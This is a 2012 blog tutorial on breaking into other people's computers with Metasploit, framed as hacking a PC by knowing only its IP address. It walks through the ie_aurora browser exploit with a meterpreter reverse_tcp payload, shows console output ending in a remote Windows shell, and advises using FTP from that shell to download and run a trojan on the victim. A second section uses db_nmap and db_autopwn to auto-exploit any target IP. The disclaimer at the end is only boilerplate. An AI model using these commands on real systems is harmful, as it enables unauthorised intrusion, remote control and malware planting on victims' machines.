Wednesday, March 21, 2012
Hack pc with Metasploit: using nmap & Postgresql | [ip hacking] Full Tutorial
Do you like this story?
metasploit [hackers friendly tool]
1. hacking pc with metasploit & N-MAP [ip hacking]
The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids inpenetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework
but you can hack windows with metasploit backtrack linux and much more with windows and linux so do not wait download.
If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wn you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
Note: To hack a computer using Metasploit first you should have the enough information of the target including
1: IP address
2: Open Ports
3: services running
4: Version of software running
All of these need a little work. A famous tool to do all of these is NMAP
Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.
To choose an exploit following command is there:
Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]
Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.
Show payloads
Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.
RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)
Now the Last step is to type the following command and Launch attack to the computer.
exploit
After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.
First you Must Download Metasploit
Code:
http://www.metasploit.com/releases/framework-3.3.3.exe
(Windows OS)
After Download & Install
Run Metasploit Update And Wait Until Update Complete!
Then Run Metasploit Console
Then Do Like This(Bolds Texts is Which You must Write):
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:http://192.168.0.151:8080/[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]_________________________________________________
2. hacking pc remotely with [ip address] metasploit & postgresql
- First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
- You need PostgrSQL for your database. Download here: {{http://www.postgresql.org/}} Make sure you use all the defaults or Metasploit woun’t work!
- Now lets get down to buisness… After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5…
- Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:
- Now, in the window type:db_connect postgres:ThePassYouChose@localhost:5432
- The first time you do this you will see lots of text flash buy. Don’t wory, this is normal.
- Type db_host to make sure you are connected correctally.
- Now type this:db_nmap 000.000.000.000Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000…Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back…
- After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
- Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this: sessions -i ExploitNumber
Blog Warning:
HEY VISITORS THIS IS A NOTE FROM ADMIN:
THIS WEBSITE IS BUILD BY ME ONLY FOR EDUCATIONAL PURPOSE I JUST WANT TO PROVIDE CYBER TIPS SO IF U USE THESE INFORMATION TO HARM ANY SUBSTANCE,COMMUNITY OR PERSON AND GOT CAUGHT THEN I AM NOT RESPONSIBLE FOR IT SO MIND MY WORDS HACKING IS A CYBER CRIME DON'T CHEAT OTHERS WITH YOUR POWERS
KNOWLEDGE IS FOR SHARING ASK-SHARE
THIS WEBSITE IS BUILD BY ME ONLY FOR EDUCATIONAL PURPOSE I JUST WANT TO PROVIDE CYBER TIPS SO IF U USE THESE INFORMATION TO HARM ANY SUBSTANCE,COMMUNITY OR PERSON AND GOT CAUGHT THEN I AM NOT RESPONSIBLE FOR IT SO MIND MY WORDS HACKING IS A CYBER CRIME DON'T CHEAT OTHERS WITH YOUR POWERS
KNOWLEDGE IS FOR SHARING ASK-SHARE
FOR MORE INFORMATION MAIL ME:
STSHREYASH50@GMAIL.COM